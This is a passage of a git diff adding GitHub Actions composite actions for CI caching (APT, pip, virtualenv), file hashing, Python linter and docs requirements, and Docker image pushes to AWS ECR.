+ shell: bash
\ No newline at end of file
diff --git a/.github/actions/apt_requirements/save_apt_cache/README.md b/.github/actions/apt_requirements/save_apt_cache/README.md
new file mode 100644
index 00000000..4d8dca82
--- /dev/null
+++ b/.github/actions/apt_requirements/save_apt_cache/README.md
@@ -0,0 +1,22 @@
+# Composite action save APT cache
+
+This action saves the APT cache, almost always located at `/var/cache/apt/archives/*.deb` to the GitHub's cache.
+
+Combined with [**restore_apt_cache**](../restore_apt_cache/README.md) helps save time by avoiding the download of APT requirements.
+
+The action is composed of two steps:
+
+1. **Compute APT requirements file SHA256 hash** - This step uses the [**misc/compute_files_hash**](../../misc/compute_files_hash/README.md) action to compute the SHA256 hash of the APT requriments file that will be part of the cache key.
+2. **Save APT cache** - This step does the real caching on GitHub. The GitHub's [**cache/save**](https://github.com/actions/cache/blob/main/save/README.md) is used with the following parameters:
+ 1. **path** - A list of files, directories, or paths to cache - set to `/var/cache/apt/archives/*.deb` to save all `*.deb` files in APT cache.
+ 2. **key** - An explicit key for a cache entry - set to the combination of three strings:
+ 1. *git_reference*, provided as an input to the action.
+ 2. A static part, `-apt-`
+ 3. The previously computed SHA256 hash of the APT requirements file.
+
+## Documentation
+
+### Inputs
+
+* **apt_requirements_file_path** - Required - Path to the APT requirements file. It will be used to compute a SHA256 hash used in the cache key.
+* **git_reference** - Optional - A git reference that will be used to build the cache key. It defaults to `github.ref_name` which is a context variable containing **the short ref name of the branch or tag that triggered the workflow run**. For example it may be `feature-branch-1` or, for pull requests, `/merge`.
diff --git a/.github/actions/apt_requirements/save_apt_cache/action.yml b/.github/actions/apt_requirements/save_apt_cache/action.yml
new file mode 100644
index 00000000..af41cfde
--- /dev/null
+++ b/.github/actions/apt_requirements/save_apt_cache/action.yml
@@ -0,0 +1,24 @@
+name: Composite action save APT cache
+description: Composite action to save APT cache
+inputs:
+ apt_requirements_file_path:
+ description: Path to the APT requirements file
+ required: true
+ git_reference:
+ description: A git reference (name of the branch, reference to the PR) that will be used to build the cache key.
+ required: false
+ default: ${{ github.ref_name }}
+
+runs:
+ using: "composite"
+ steps:
+ - name: Compute APT requiremments file SHA256 hash
+ id: compute_apt_requirements_file_sha256_hash
+ uses: ./.github/actions/misc/compute_files_hash
+ with:
+ file_paths: ${{ inputs.apt_requirements_file_path }}
+ - name: Save APT cache
+ uses: actions/cache/save@v4
+ with:
+ path: /var/cache/apt/archives/*.deb
+ key: ${{ inputs.git_reference }}-apt-${{ steps.compute_apt_requirements_file_sha256_hash.outputs.computed_hash }}
\ No newline at end of file
diff --git a/.github/actions/codeql/action.yml b/.github/actions/codeql/action.yml
index b49e2b60..22c16e19 100644
--- a/.github/actions/codeql/action.yml
+++ b/.github/actions/codeql/action.yml
@@ -12,13 +12,12 @@ runs:
using: "composite"
steps:
- name: Initialize CodeQL
- uses: github/codeql-action/init@v2
+ uses: github/codeql-action/init@v3
with:
languages: ${{ inputs.language }}
- setup-python-dependencies: false
source-root: ${{ inputs.working_directory }}
- name: Perform CodeQL Analysis
- uses: github/codeql-action/analyze@v2
+ uses: github/codeql-action/analyze@v3
diff --git a/.github/actions/misc/compute_files_hash/README.md b/.github/actions/misc/compute_files_hash/README.md
new file mode 100644
index 00000000..f1c594f3
--- /dev/null
+++ b/.github/actions/misc/compute_files_hash/README.md
@@ -0,0 +1,18 @@
+# Composite action compute files hash
+
+This action computes a single SHA256 hash of one or more files.
+Given a **space separated list of file paths**, a new file is created by concatenating all those files together. Then the SHA256 hash of the newly created file is computed and returned as the output.
+
+Before being joined together, each file is tested to ensure that it **exists** and that it is **a regular file**.
+
+This action is useful when saving/restoring a cache in which a unique key is required. As a matter of fact, the hash is used as a part of the hash key.
+
+## Documentation
+
+### Inputs
+
+* `file_paths` - Mandatory - Space separated list of file paths for which a single SHA256 hash will be computed.
+
+### Outputs
+
+* `computed_hash` - A SHA256 hash of the file obtained by joining (concatenating) all input files together.
diff --git a/.github/actions/misc/compute_files_hash/action.yml b/.github/actions/misc/compute_files_hash/action.yml
new file mode 100644
index 00000000..fca2a53a
--- /dev/null
+++ b/.github/actions/misc/compute_files_hash/action.yml
@@ -0,0 +1,40 @@
+name: Composite action compute files hash
+description: Composite action to compute a single hash of one or more files
+inputs:
+ file_paths:
+ description: Space separeted list of files for which a single SHA256 hash will be computed.
+ required: true
+
+outputs:
+ computed_hash:
+ description: The hash of the concatenated files
+ value: ${{ steps.compute_files_sha256_hash.outputs.computed_hash }}
+
+runs:
+ using: "composite"
+ steps:
+ - name: Compute files SHA256 hash
+ id: compute_files_sha256_hash
+ run: |
+ if [[ -z '${{ inputs.file_paths }}' ]]; then
+ echo "::error::file_paths cannot be empty!"
+ exit 1
+ fi
+ JOINED_FILES="cat "
+ # Create a bash array of file paths
+ for file in ${{ inputs.file_paths }};
+ do
+ if [[ -f $file ]]; then
+ # Concat file path to cat command
+ JOINED_FILES+="$file "
+ echo "::debug::Current file is $file"
+ echo "::debug::JOINED_FILES variable state is $JOINED_FILES"
+ else
+ echo "::error::$file does not exist or it is not a regular file!"
+ exit 1
+ fi
+ done
+ COMPUTED_HASH=$($JOINED_FILES | sha256sum | cut -d ' ' -f 1)
+ echo "::debug::Hash is $COMPUTED_HASH"
+ echo "computed_hash=$COMPUTED_HASH" >> $GITHUB_OUTPUT
+ shell: bash
\ No newline at end of file
diff --git a/.github/actions/push_on_ecr/action.yml b/.github/actions/push_on_ecr/action.yml
new file mode 100644
index 00000000..f130e595
--- /dev/null
+++ b/.github/actions/push_on_ecr/action.yml
@@ -0,0 +1,56 @@
+name: Composite action push on ecr
+description: Composite action push on ecr
+inputs:
+ repository:
+ description: Repository name
+ required: true
+ dockerfile:
+ description: Path for dockerfile from working directory
+ required: true
+ working_directory:
+ description: Docker build context
+ required: true
+
+ aws_account_id:
+ description: Aws User code
+ required: true
+ aws_access_key:
+ description: Aws access key
+ required: true
+ aws_secret_access_key:
+ description: Aws secret access key
+ required: true
+ image_tag:
+ description: Directory that must be run against the linters
+ required: true
+
+ aws_region:
+ description: Aws region
+ required: true
+
+runs:
+ using: "composite"
+ steps:
+ - name: Configure AWS Credentials
+ uses: aws-actions/configure-aws-credentials@v4
+ with:
+ aws-region: ${{ inputs.aws_region}}
+ aws-access-key-id: ${{ inputs.aws_access_key }}
+ aws-secret-access-key: ${{ inputs.aws_secret_access_key }}
+
+ - name: Login to Amazon ECR Private
+ id: login-ecr
+ uses: aws-actions/amazon-ecr-login@v2
+
+ - name: Set up Docker Buildx
+ uses: docker/setup-buildx-action@v3
+
+ - name: Build and push
+ uses: docker/build-push-action@v5
+ with:
+ context: ${{ inputs.working_directory }}
+ push: true
+ cache-from: type=gha
+ cache-to: type=gha,mode=max
+ tags: ${{inputs.aws_account_id}}.dkr.ecr.${{inputs.aws_region}}.amazonaws.com/${{ inputs.repository }}:${{ inputs.image_tag }}
+ file: ${{ inputs.working_directory }}/${{ inputs.dockerfile }}
diff --git a/.github/actions/python_linter/action.yml b/.github/actions/python_linter/action.yml
index 8c285e00..1bd46376 100644
--- a/.github/actions/python_linter/action.yml
+++ b/.github/actions/python_linter/action.yml
@@ -5,6 +5,12 @@ inputs:
description: Directory that must be run against the linters
required: true
+ use_autoflake:
+ description: Use autoflake
+ required: true
+ use_bandit:
+ description: Use bandit linter
+ required: true
use_black:
description: Use black formatter
required: true
@@ -17,11 +23,11 @@ inputs:
use_pylint:
description: Use pylint linter
required: true
- use_bandit:
- description: Use bandit linter
+ use_ruff_formatter:
+ description: Use ruff formatter
required: true
- use_autoflake:
- description: Use autoflake
+ use_ruff_linter:
+ description: Use ruff linter
required: true
runs:
@@ -66,11 +72,9 @@ runs:
else
echo "Skipping isort linter"
fi
-
working-directory: ${{ inputs.working_directory }}
shell: bash
-
- name: bandit
run: |
if [[ ${{inputs.use_bandit }} != 'false' ]]; then
@@ -78,7 +82,6 @@ runs:
else
echo "Skipping bandit linter"
fi
-
working-directory: ${{ inputs.working_directory }}
shell: bash
@@ -90,4 +93,24 @@ runs:
echo "Skipping autoflake"
fi
working-directory: ${{ inputs.working_directory }}
+ shell: bash
+
+ - name: ruff formatter
+ run: |
+ if [[ ${{ inputs.use_ruff_formatter }} != 'false' ]]; then
+ ruff format --config ${GITHUB_WORKSPACE}/.github/configurations/python_linters/.ruff.toml --diff .
+ else
+ echo "Skipping ruff formatter"
+ fi
+ working-directory: ${{ inputs.working_directory }}
+ shell: bash
+
+ - name: ruff linter
+ run: |
+ if [[ ${{ inputs.use_ruff_linter }} != 'false' ]]; then
+ ruff check --config ${GITHUB_WORKSPACE}/.github/configurations/python_linters/.ruff.toml .
+ else
+ echo "Skipping ruff linter"
+ fi
+ working-directory: ${{ inputs.working_directory }}
shell: bash
\ No newline at end of file
diff --git a/.github/actions/python_requirements/create_dev_requirements_file/README.md b/.github/actions/python_requirements/create_dev_requirements_file/README.md
new file mode 100644
index 00000000..ae32be02
--- /dev/null
+++ b/.github/actions/python_requirements/create_dev_requirements_file/README.md
@@ -0,0 +1,13 @@
+# Composite action create Python dev requirements file
+
+This action creates the `requirements-dev.txt` file which will contain all **development dependencies**.
+
+As of today, the only development dependency supported is `coverage`.
+
+## Documentation
+
+### Inputs
+
+* **install_from** - Optional - The path used as working directory when creating the `requirements-dev.txt` file. It defaults to the current directory (i.e. `.`).
+* **project_dev_requirements_file** - Optional - The path of a project `requirements-dev.txt`. This was designed in case development requirements other than coverage are required. If specified, the dependencies in the project `requirements-dev.txt` will be appended in the newly created `requirements-dev.txt`. **Be careful: if a relative path is used this will depend on *install_from*.** Defaults to empty strings, and hence **no custom `requirements-dev.txt`**.
+* **use_coverage** - Optional - Whether to use coverage or not. It defaults to false.
diff --git a/.github/actions/python_requirements/create_dev_requirements_file/action.yml b/.github/actions/python_requirements/create_dev_requirements_file/action.yml
new file mode 100644
index 00000000..eb86a046
--- /dev/null
+++ b/.github/actions/python_requirements/create_dev_requirements_file/action.yml
@@ -0,0 +1,28 @@
+name: Composite action create Python dev requirements file
+description: Composite action to create Python dev requirements file
+inputs:
+ install_from:
+ description: Directory that must be used to install the packages
+ required: false
+ default: .
+ project_dev_requirements_file:
+ description: An additional project dev requirements file
+ required: false
+ use_coverage:
+ description: Use coverage.py
+ required: false
+
+runs:
+ using: "composite"
+ steps:
+ - name: Create requirements-dev.txt
+ run: |
+ echo > requirements-dev.txt
+ if [[ '${{ inputs.use_coverage }}' != 'false' ]]; then
+ echo "coverage>=7.3.2" >> requirements-dev.txt
+ fi
+ if [[ -z '${{ inputs.project_dev_requirements_file }}' ]];then
+ cat $(echo ${{ inputs.project_dev_requirements_file }}) >> requirements-dev.txt
+ fi
+ shell: bash
+ working-directory: ${{ inputs.install_from }}
\ No newline at end of file
diff --git a/.github/actions/python_requirements/create_docs_requirements_file/README.md b/.github/actions/python_requirements/create_docs_requirements_file/README.md
new file mode 100644
index 00000000..913192f8
--- /dev/null
+++ b/.github/actions/python_requirements/create_docs_requirements_file/README.md
@@ -0,0 +1,12 @@
+# Composite action create Python docs requirements file
+
+This action creates the `requirements-docs.txt` file. This is a Python requirements file that will contain all **dependencies required to build the documentation**.
+
+## Documentation
+
+### Inputs
+
+* **install_from** - Optional - The path used as working directory when creating the `requirements-docs.txt` file. It defaults to the current directory (i.e. `.`).
+* **project_docs_requirements_file** - Optional - The path of a project `requirements-docs.txt`. This was designed in case requirements to build documentation other than rstcheck, sphinx, sphinx_rtd_theme, sphinxcontrib-spelling and sphinxcontrib-django2 are required. If specified, the dependencies in the project `requirements-docs.txt` will be appended in the newly created `requirements-docs.txt`. **Be careful: if a relative path is used this will depend on *install_from*.** Defaults to empty strings, and hence **no custom `requirements-docs.txt`**.
+* **django_settings_module** - Optional - Path to the Django settings file. It's used to make GitHub action aware of Django presence. In this case, `sphinxcontrib-django2` is also added to the newly created requirement file. **Be careful: if a relative path is used this will depend on *install_from*.** Defaults to empty strings, and hence **no Django settings file**.
+* **check_docs_directory** - Optional - Path that will be used by rstcheck to check documentation. **Be careful: if a relative path is used this will depend on *install_from*.** Defaults to empty strings, and hence **documentation won't be checked**.
diff --git a/.github/actions/python_requirements/create_docs_requirements_file/action.yml b/.github/actions/python_requirements/create_docs_requirements_file/action.yml
new file mode 100644
index 00000000..fb674f80
--- /dev/null
+++ b/.github/actions/python_requirements/create_docs_requirements_file/action.yml
@@ -0,0 +1,37 @@
+name: Composite action create Python docs requirements file
+description: Composite action to create Python docs requirements file
+inputs:
+ install_from:
+ description: Directory that must be used to install the packages
+ required: false
+ default: .
+ project_docs_requirements_file:
+ description: An additional project docs requirements file
+ required: false
+ django_settings_module:
+ description: Path to the django settings file
+ required: false
+ check_docs_directory:
+ description: Check docs using rstcheck inside this directory
+ required: false
+
+runs:
+ using: "composite"
+ steps:
+ - name: Create requirements-docs.txt
+ run: |
+ echo > requirements-docs.txt
+ if [[ -n '${{ inputs.check_docs_directory }}' ]]; then
+ echo "rstcheck[sphinx]" >> requirements-docs.txt
+ echo "sphinx==7.2.6" >> requirements-docs.txt
+ echo "sphinx_rtd_theme==1.3.0" >> requirements-docs.txt
+ echo "sphinxcontrib-spelling==8.0.0" >> requirements-docs.txt
+ if [[ -n '${{ inputs.django_settings_module }}' ]]; then
+ echo "sphinxcontrib-django2==1.9" >> requirements-docs.txt
+ fi
+ if [[ -z '${{ inputs.project_docs_requirements_file }}' ]];then
+ cat $(echo ${{ inputs.project_docs_requirements_file }}) >> requirements-docs.txt
+ fi
+ fi
+ shell: bash
+ working-directory: ${{ inputs.install_from }}
\ No newline at end of file
diff --git a/.github/actions/python_requirements/create_linter_requirements_file/README.md b/.github/actions/python_requirements/create_linter_requirements_file/README.md
new file mode 100644
index 00000000..fafbb9b1
--- /dev/null
+++ b/.github/actions/python_requirements/create_linter_requirements_file/README.md
@@ -0,0 +1,32 @@
+# Composite action create Python linter requirements file
+
+This action creates the `requirements-linters.txt` file which will contain all **linter dependencies** required by the CI.
+The user can then choose which linters will be run, and hence written to the `requirements-linters.txt`, by the CI by setting some flags to true like *use_black*.
+
+As of today only the following linters are supported:
+
+* `autoflake`
+* `bandit`
+* `black`
+* `flake8`
+* `flake8-django`
+* `isort`
+* `pylint`
+* `pylint-django`
+* `ruff`
+
+## Documentation
+
+### Inputs
+
+* **install_from** - Optional - The path used as working directory when creating the `requirements-linters.txt` file. It defaults to the current directory (i.e. `.`).
+* `project_linter_requirements_file` - Optional - The path of a project `requirements-linters.txt`. This was designed in case requirements for linters other than `autoflake`, `bandit`, `black`, `flake8`, `flake8-django`, `isort`, `pylint` and `pylint-django` are required. If specified, the dependencies in the project `requirements-linters.txt` will be appended in the newly created `requirements-linters.txt`. **Be careful: if a relative path is used this will depend on *install_from*.** Defaults to empty strings, and hence **no custom `requirements-linters.txt`**.
+* **django_settings_module** - Optional - Path to the Django settings file. It's used to make GitHub action aware of Django presence. In the case of a Django project, `flake8-django` and `pylint-django`, may be used and hence they will be added to the newly created requirements file. **Be careful: if a relative path is used this will depend on *install_from*.** Defaults to empty strings, and hence **no Django settings file**.
+* **use_autoflake** - Optional - Flag to state whether to use or not `autoflake` linter. It defaults to false.
+* **use_bandit** - Optional - Flag to state whether to use or not `bandit` linter. It defaults to false.
+* **use_black** - Optional - Flag to state whether to use `black` formatter. It defaults to false.
+* **use_flake8** - Optional - Flag to state whether to use or not `flake8` linter. It defaults to false.
+* **use_isort** - Optional - Flag to state whether to use or not `isort` formatter. It defaults to false.
+* **use_pylint** - Optional - Flag to state whether to use or not `pylint` linter. It defaults to false.
+* **use_ruff_formatter** - Optional - Flag to state whether to use `ruff` **formatter** (so without the linting). It defaults to false.
+* **use_ruff_linter** - Optional - Flag to state whether to use `ruff` **linter** (so without the formatting). It defaults to false.
diff --git a/.github/actions/python_requirements/create_linter_requirements_file/action.yml b/.github/actions/python_requirements/create_linter_requirements_file/action.yml
new file mode 100644
index 00000000..b7ac0923
--- /dev/null
+++ b/.github/actions/python_requirements/create_linter_requirements_file/action.yml
@@ -0,0 +1,103 @@
+name: Composite action create Python linter requirements file
+description: Composite action to create Python linter requirements file
+inputs:
+ install_from:
+ description: Directory that must be used to install the packages
+ required: false
+ default: .
+ project_linter_requirements_file:
+ description: An additional project linter requirements file
+ required: false
+ django_settings_module:
+ description: Path to the django settings file
+ required: false
+ use_autoflake:
+ description: Use autoflake linter
+ required: false
+ use_bandit:
+ description: Use bandit linter
+ required: false
+ use_black:
+ description: Use black formatter
+ required: false
+ use_flake8:
+ description: Use flake8 linter
+ required: false
+ use_isort:
+ description: Use isort formatter
+ required: false
+ use_pylint:
+ description: Use pylint linter
+ required: false
+ use_ruff_formatter:
+ description: Use ruff formatter
+ required: false
+ use_ruff_linter:
+ description: Use ruff linter
+ required: false
+
+
+runs:
+ using: "composite"
+ steps:
+ - name: Create requirements-linters.txt
+ run: |
+ function check_linter_dependency_and_append_to_file {
+ #
+ # Function to check whether a specific linter is in the requirements file
+ # If it can be found inside the requirements, said linter dependency will be appended to a newly created requirements-linter.txt file.
+ # If the linter is not found inside the requirements file an error will be raised.
+ #
+ # 1st parameter: Name of the linter.
+ # 2nd parameter: Path of the requirements file.
+ #
+ if [[ -z $(grep -P "^$1[^a-zA-Z0-9_-].*" "$2") ]]; then
+ echo "::error::$1 dependency not found in $2 file!"
+ exit 1
+ else
+ echo "$1 dependency found in $2!"
+ echo "$(grep -P ^$1[^a-zA-Z0-9_-].* $2)" >> requirements-linters.txt
+ fi
+ }
+ CI_REQUIREMENTS_LINTERS="${GITHUB_WORKSPACE}/.github/configurations/python_linters/requirements-linters.txt"
+ echo > requirements-linters.txt
+
+ if [[ '${{ inputs.use_black }}' != 'false' ]]; then
+ check_linter_dependency_and_append_to_file "black" "$CI_REQUIREMENTS_LINTERS"
+ fi
+
+ if [[ '${{ inputs.use_isort }}' != 'false' ]]; then
+ check_linter_dependency_and_append_to_file "isort" "$CI_REQUIREMENTS_LINTERS"
+ fi
+
+ if [[ '${{ inputs.use_flake8 }}' != 'false' ]]; then
+ check_linter_dependency_and_append_to_file "flake8" "$CI_REQUIREMENTS_LINTERS"
+ if [[ -n '${{ inputs.django_settings_module }}' ]]; then
+ check_linter_dependency_and_append_to_file "flake8-django" "$CI_REQUIREMENTS_LINTERS"
+ fi
+ fi
+
+ if [[ '${{ inputs.use_pylint }}' != 'false' ]]; then
+ check_linter_dependency_and_append_to_file "pylint" "$CI_REQUIREMENTS_LINTERS"
+ if [[ -n '${{ inputs.django_settings_module }}' ]]; then
+ check_linter_dependency_and_append_to_file "pylint-django" "$CI_REQUIREMENTS_LINTERS"
+ fi
+ fi
+
+ if [[ '${{ inputs.use_bandit }}' != 'false' ]]; then
+ check_linter_dependency_and_append_to_file "bandit" "$CI_REQUIREMENTS_LINTERS"
+ fi
+
+ if [[ '${{ inputs.use_autoflake }}' != 'false' ]]; then
+ check_linter_dependency_and_append_to_file "autoflake" "$CI_REQUIREMENTS_LINTERS"
+ fi
+
+ if [[ '${{ inputs.use_ruff_formatter }}' != 'false' || '${{ inputs.use_ruff_linter }}' != 'false' ]]; then
+ check_linter_dependency_and_append_to_file "ruff" "$CI_REQUIREMENTS_LINTERS"
+ fi
+
+ if [[ -z '${{ inputs.project_linter_requirements_file }}' ]]; then
+ cat $(echo ${{ inputs.project_linter_requirements_file }}) >> requirements-linters.txt
+ fi
+ shell: bash
+ working-directory: ${{ inputs.install_from }}
\ No newline at end of file
diff --git a/.github/actions/python_requirements/create_virtualenv/README.md b/.github/actions/python_requirements/create_virtualenv/README.md
new file mode 100644
index 00000000..8f3361a6
--- /dev/null
+++ b/.github/actions/python_requirements/create_virtualenv/README.md
@@ -0,0 +1,20 @@
+# Composite action create Python virtual environment
+
+This GitHub action creates a Python virtual environment using Python's `venv` module.
+
+When the *activate_only* flag set is to true, the virtual environment at *virtualenv_path* will only be activated—**no creation will take place**.
+
+NOTE:
+
+To activate a Python virtual environment, the `activate` script is often used.
+However, in a GitHub Action environment, this is not enough because environment variables are "lost" at the end of the Action. For this we need to do two things:
+
+1. Append the `VIRTUAL_ENV` environment variable to the `GITHUB_ENV` environment file. The [`GITHUB_ENV`](https://docs.github.com/en/enterprise-cloud@latest/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions#setting-an-environment-variable) files makes environment variables available to any subsequent steps in a workflow job. Finally, it's important to note that `VIRTUAL_ENV` variable is created by the `activate` script and contains the path to the virtual environment.
+2. Prepend the virtual environment's `bin` path to the system PATH. To allow also any subsequent steps in a workflow to be able to use it, [`GITHUB_PATH`](https://docs.github.com/en/enterprise-cloud@latest/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions#adding-a-system-path) is employed.
+
+## Documentation
+
+### Inputs
+
+* **virtualenv_path** - Optional - The path where the virtual environment will be created. It defaults to `.venv`.
+* **activate_only** - Optional - Flag that states whether to only activate the virtual environment. If false, a new virtual environment will be created before being activated. It defaults to false.
\ No newline at end of file
diff --git a/.github/actions/python_requirements/create_virtualenv/action.yml b/.github/actions/python_requirements/create_virtualenv/action.yml
new file mode 100644
index 00000000..02dcb936
--- /dev/null
+++ b/.github/actions/python_requirements/create_virtualenv/action.yml
@@ -0,0 +1,28 @@
+name: Composite action create Python virtual environment
+description: Composite action create Python virtual environment
+inputs:
+ virtualenv_path:
+ description: Python's virtual environment path.
+ required: false
+ default: ".venv"
+ activate_only:
+ description: Whether to create the virtual environment or only activate it.
+ required: false
+ default: false
+
+runs:
+ using: "composite"
+ steps:
+ - name: Python's virtualenv creation
+ if: inputs.activate_only != 'true'
+ run: python -m venv ${{ inputs.virtualenv_path }}
+ shell: bash
+ - name: Activate newly created virtualenv
+ id: activate_newly_created_virtualenv
+ run: |
+ source ${{ inputs.virtualenv_path }}/bin/activate
+ echo "VIRTUAL_ENV=$VIRTUAL_ENV" >> $GITHUB_ENV
+ echo "::debug::Virtual environment path is $VIRTUAL_ENV"
+ echo "$VIRTUAL_ENV/bin" >> $GITHUB_PATH
+ echo "::debug::PATH environment variable state after $VIRTUAL_ENV/bin path being added to it: $GITHUB_PATH"
+ shell: bash
diff --git a/.github/actions/python_requirements/restore_pip_cache/README.md b/.github/actions/python_requirements/restore_pip_cache/README.md
new file mode 100644
index 00000000..92a2a2fd
--- /dev/null
+++ b/.github/actions/python_requirements/restore_pip_cache/README.md
@@ -0,0 +1,41 @@
+# Composite action restore pip cache
+
+This action restores the pip download cache from GitHub's cache.
+
+The action is composed of four steps:
+
+1. **Generate random UUID** - This step computes a random UUID, using the shell command `uuidgen`, which will be part of the cache key. Since pip cache will always be restored when a virtual environment is not found on GitHub's cache, a random UUID is required to generate a cache miss.
+2. **Get pip cache directory** - This step retrieves the path to the pip cache. If *custom_pip_cache_path* is not an empty string, it will be used as pip cache path. Otherwise, the pip cache will be computed using `pip cache dir`.
+3. **Restore pip cache** - This step performs the heavy lifting of the restoring. Using GitHub's [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md) action, the cache is restored using a **partial match**. This is performed by setting the following [inputs](https://github.com/actions/cache/tree/main/restore#inputs):
+ 1. **key** - an explicit key for a cache entry - will be set to a random UUID which will always trigger a cache miss.
+ 2. **path** - a list of files, directories, paths to restore - will be set to the pip download cache path.
+ 3. **restore-keys** - an ordered list of prefix-matched keys to use for restoring stale cache if no cache hit occurred for key - will be set to `-pip-cache-` to restore the most recent pip cache for the chosen git reference.
+4. **Explain cache output** - This step analyze the results of the [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md) action and sets *real_cache_hit* environment variable to true if there was a match, false otherwise. This is necessary because, in the case of a **partial match**, the *cache-hit*, output of [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md), will be false. Instead, we use the `cache-matched-key`, another output of [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md), which contains a reference for both **partial** and full matches, but will be empty in the case of a cache miss.
+
+NOTE:
+
+This action, despite seeming a bit unusual, is correct because GitHub does not allow cache updates or overwrites.
+
+Let's think about a real-world scenario:
+
+A user updates the requirements file.
+
+In this case our query to GitHub's cache for the previously cached virtual environment will **always** miss. This happens because changing the requirements file results in a new SHA256 hash, so the cache key changes.
+
+Thus, we aim to restore the pip cache to at least *mitigate* the impact of the changes in the requirements. Specifically, we want to save time by avoiding the download of packages that did not change.
+
+Next, we try to query the GitHub's cache for the previously cached pip cache. However, there are a few issues:
+
+1. We cannot use the SHA256 of the requirements file because it has changed, leading to cache misses.
+2. We cannot create a cache key without a random component because, as said earlier, GitHub does not allow overwriting or updating of a cache item. For example, a cache key like `develop-pip-cache-` would generate an error when attempting to save a new cache if one already exists with the same name.
+
+## Documentation
+
+### Inputs
+
+* **custom_pip_cache** - Optional - Path to the pip cache. It can be used for setting a custom pip cache path. It defaults to an empty string. In this case, the pip cache path will be computed using `pip cache dir`. More information regarding the previous command is available [here](https://pip.pypa.io/en/stable/cli/pip_cache/#description)
+* **git_reference** - Optional - A git reference that will be used to build the cache key. It defaults to `github.ref_name` which is a context variable containing **the short ref name of the branch or tag that triggered the workflow run**. For example it may be `feature-branch-1` or, for pull requests, `/merge`.
+
+### Outputs
+
+* **cache-hit** - A boolean value which states whether pip cache was found on GitHub's cache or not.
diff --git a/.github/actions/python_requirements/restore_pip_cache/action.yml b/.github/actions/python_requirements/restore_pip_cache/action.yml
new file mode 100644
index 00000000..e4568f79
--- /dev/null
+++ b/.github/actions/python_requirements/restore_pip_cache/action.yml
@@ -0,0 +1,53 @@
+name: Composite action restore pip cache
+description: Composite action to restore pip cache
+inputs:
+ custom_pip_cache_path:
+ description: Path to pip cache.
+ required: false
+ git_reference:
+ description: A git reference (name of the branch, reference to the PR) that will be used to build the cache key.
+ required: false
+ default: ${{ github.ref_name }}
+
+outputs:
+ cache-hit:
+ description: Whether pip cache was found in the cache or not.
+ value: ${{ steps.explain_cache_output.outputs.real_cache_hit }}
+
+runs:
+ using: "composite"
+ steps:
+ - name: Generate random UUID
+ id: generate_random_uuid
+ run: |
+ random_uuid=$(uuidgen -r)
+ echo "::debug::Random uuid generated is $random_uuid. Should only cause a cache-miss"
+ echo "computed_uuid=$random_uuid" >> $GITHUB_OUTPUT
+ shell: bash
+ - name: Get pip cache directory
+ id: get_pip_cache_directory
+ run: |
+ if [[ -z '${{ inputs.custom_pip_cache_path }}' ]]; then
+ echo "pip_cache_path=$(pip cache dir)" >> $GITHUB_OUTPUT
+ else
+ echo "pip_cache_path=${{ inputs.custom_pip_cache_path }}" >> $GITHUB_OUTPUT
+ fi
+ echo "::debug::Pip cache path $pip_cache_path"
+ shell: bash
+ - name: Restore pip cache
+ id: restore_pip_cache
+ uses: actions/cache/restore@v4
+ with:
+ key: ${{ steps.generate_random_uuid.outputs.computed_uuid }}
+ path: ${{ steps.get_pip_cache_directory.outputs.pip_cache_path }}
+ restore-keys: ${{ inputs.git_reference }}-pip-cache-
+ - name: Explain cache output
+ id: explain_cache_output
+ run: |
+ echo "::debug::Restore action for pip's cache returned cache-hit: ${{ steps.restore_pip_cache.outputs.cache-hit }} with cache-matched-key: ${{ steps.restore_pip_cache.outputs.cache-matched-key }}"
+ if [[ -z '${{ steps.restore_pip_cache.outputs.cache-matched-key }}' ]]; then
+ echo "real_cache_hit=false" >> $GITHUB_OUTPUT
+ else
+ echo "real_cache_hit=true" >> $GITHUB_OUTPUT
+ fi
+ shell: bash
\ No newline at end of file
diff --git a/.github/actions/python_requirements/restore_virtualenv/README.md b/.github/actions/python_requirements/restore_virtualenv/README.md
new file mode 100644
index 00000000..e40a3c1c
--- /dev/null
+++ b/.github/actions/python_requirements/restore_virtualenv/README.md
@@ -0,0 +1,30 @@
+# Composite action restore Python virtual environment
+
+This action restores a Python virtual environment from GitHub's cache.
+
+Combined with [**save_virtualenv**](../save_virtualenv/README.md), **it helps save time by avoiding the installation of Python requirements**.
+
+The action is composed of three steps:
+
+1. **Compute requirements files SHA256 hash** - This step uses [**misc/compute_files_hash**](../../misc/compute_files_hash/README.md) action to compute a single SHA256 hash of the files described by the *requirements_paths*. The computed SHA256 hash will be part of the cache key.
+2. **Restore virtual environment** - This step does the heavy lifting of restoring the virtual environment from GitHub's cache. It uses the GitHub's [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md) action with the following parameters:
+ * **path** - A list of files, directories, or paths to restore - set to the virtual environment path input variable *virtual_environment_path*.
+ * **key** - An explicit key for a cache entry - set to the combination of three strings:
+ * *git_reference*, provided as an input to the action.
+ * A static part, `-venv-`
+ * The previously computed SHA256 hash of the requirements files.
+3. **Activate restored virtual environment** - If the Python virtual environment was found in the GitHub's cache, it needs to be activated. This is performed using [**python_requirements/create_virtualenv**](../create_virtualenv/README.md) action with the following parameters:
+ * **virtualenv_path** - set to the Python virtual environment path.
+ * **activate_only** - set to true because it doesn't need to be created.
+
+## Documentation
+
+### Inputs
+
+* **virtual_environment_path** - Optional - Path where the virtual environment is located. It may be used to provide a custom path for the virtual environment. It defaults to `.venv`.
+* **requirements_paths** - Required - A space separated list of requirements file paths. They will be used to compute a SHA256 hash used in the cache key. It defaults to an empty string.
+* **git_reference** - Optional - A git reference that will be used to build the cache key. It defaults to `github.ref_name` which is a context variable containing **the short ref name of the branch or tag that triggered the workflow run**. For example it may be `feature-branch-1` or, for pull requests, `/merge`.
+
+### Outputs
+
+* **cache-hit** - A boolean value which is true when virtual environment is found in the GitHub's cache, false otherwise.
diff --git a/.github/actions/python_requirements/restore_virtualenv/action.yml b/.github/actions/python_requirements/restore_virtualenv/action.yml
new file mode 100644
index 00000000..cd76c98e
--- /dev/null
+++ b/.github/actions/python_requirements/restore_virtualenv/action.yml
@@ -0,0 +1,43 @@
+name: Composite action restore Python virtual environment
+description: Composite action to restore Python virtual environment
+inputs:
+ virtual_environment_path:
+ description: Path to where virtual environment will be restored.
+ required: false
+ default: ".venv"
